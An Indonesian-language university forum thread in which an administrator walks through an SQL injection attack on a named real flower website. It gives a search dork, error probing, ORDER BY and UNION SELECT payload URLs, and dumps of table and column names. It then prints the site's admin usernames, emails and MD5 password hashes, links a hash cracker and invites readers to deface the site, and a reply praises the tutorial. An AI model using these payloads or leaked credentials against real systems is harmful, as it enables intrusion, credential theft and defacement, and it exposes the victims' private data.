UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeSearchRegisterLog in

Share
 

 [again] nginjek pke sql

Go down 
AuthorMessage
jzt.nwbie
Administrator
Administrator
jzt.nwbie

Male Number of posts : 529
Location : /home/jzt.nwbie
Points : 109
Registration date : 2008-09-16

[again] nginjek pke sql Empty
PostSubject: [again] nginjek pke sql   [again] nginjek pke sql I_icon_minitimeTue Apr 07, 2009 1:36 am

=================================================
dork : inurl:"mod.php?mod=publisher
place : myR00M
location : A****A
time : 00:35 wib
=================================================

/* ACTION START */

step by step

1. cari target:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46

2. cek bug:
code : ' or -
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46'

klo ada error (warning) like this:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in home/flora/public_html/mod/publisher/publisher.php on line 309

berarti bse di inject, klo g ada warning...
cari target lain... msti sbar...

NEXT ( --> PAS UDAH DAPAT TARGENYA )

3. ngitung jumlah tabel:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+1
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+2
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+3
-->etc
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11
-->end

akhirnya, brenti di angka 11... artinya ada 10 kolom

4. cari no togel:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,3,4,5,6,7,8,9,10--

hasil: dapatnya angka 3

5. cari tau versi:
code = @@version or version()

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10--

6. cari nama table:
code = group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

kluar deh tabel2-na...
authors,banner,bannerclient,counter,exchange_links,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_components,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_

7. cari nama kolom dalam tabel pilihan (pilihan = authors) :
code = group_concat(column_name)
+from+information_schema.columns+where+table_name=0x[konversi nama kolom ascii ke hex]--

sebelumnya, convert code ascii dari tabel yg akan dilihat kolomnya.

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns+where+table_name=0x617574686f7273--

8. ngliat isi table
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),4,5,6,7,8,9,10%20from%20authors

hasilnya:
florakita:florakita::anantakarna@yahoo.com:979c8e8f8271e3431249f935cd7d3f4c:7,admin:admin::admin@admin.com:e6db7f33faf25a5dee7492f20b50b48d:13,duniaflora:editor::info@duniaflora.com:979c8e8f8271e3431249f935cd7d3f4c:27

tgal decrypt pwd md5-na...

===============================================================================================================================================
/* END OF ACTION */

ampe ini aja yah...
g mles nge deface nih, d ngantuk...
klo m dilanjutin deface, wong silahkan temen2...
monggo...


now, it's time for me to sleep GUYZ...
have a nice dream...
see a, tumorow

===============================================================================

-=THANKS=-
- JC, FOR HIS BLESSING TO ME
- MY_B3L0V3D_M0M... LUV U
- MY_F4M1LY_BR0TH3R5_n_515T3R5...
- MY_GIRL_b094

-=GREETZ=-
* All UnKlab Forum Members
* All Hackers-Center Members

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

N.B:

- Ascii to Hexa Converter
http://www.dolcevie.com/js/converter.html
- md5 crack
http://thesoftwareengineer.org/services/md5.php

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________
wanna be computer geek, nerd, etc...!!!
Back to top Go down
ZaNo
Whiz
Whiz
ZaNo

Male Number of posts : 245
Location : trace me if u can..
Points : 222
Registration date : 2009-02-02

[again] nginjek pke sql Empty
PostSubject: Re: [again] nginjek pke sql   [again] nginjek pke sql I_icon_minitimeSun Apr 19, 2009 11:19 am

nice tutor..
btw itu site pke eNdonesia CMS?

numpang video Proof Of Concept-nya..
http://www.kitaupload.com/download.php?file=971SQL_Injection_HOWTO.rar
Back to top Go down
 
[again] nginjek pke sql
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
Jump to: